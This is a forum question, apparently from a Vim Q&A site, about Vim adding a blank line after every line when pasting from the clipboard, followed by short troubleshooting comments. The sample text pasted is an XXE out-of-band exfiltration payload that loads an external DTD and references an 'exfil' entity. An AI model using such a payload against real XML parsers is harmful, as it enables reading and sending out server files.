# Vim adding blank line after each line when pasting from clipboard

Tags: vimrc, cut-copy-paste, os-clipboard, linux-arch

When I copy-paste multiple lines from clipboard into my vim, it inserts a blank line after every line. But when I copy in into a text editor first and then copy-paste it into vim, the blank lines are not there. What is the issue? I tried the `set ff` to check fileformat and `:e! ++=dos` solution mentioned in some thread but that didn't work. Tried the `:set paste` also.

**Example (edit):** When I copy this code from github to vim

```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
```

The output is:

```xml
<?xml version="1.0" ?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">

%sp;

%param1;

]>

<r>&exfil;</r>
```

but this doesn't happen when I first paste it into the text editor (Kate) and then copy from the editor to vim.

Comment: What is the original source of the clipboard text? File type?

Comment: multiple line code snippets from browsers usually @BLayer

Comment: How are you pasting the text? Usually pasting directly from X with `"+p` or `"*p` fixes these kind of issues.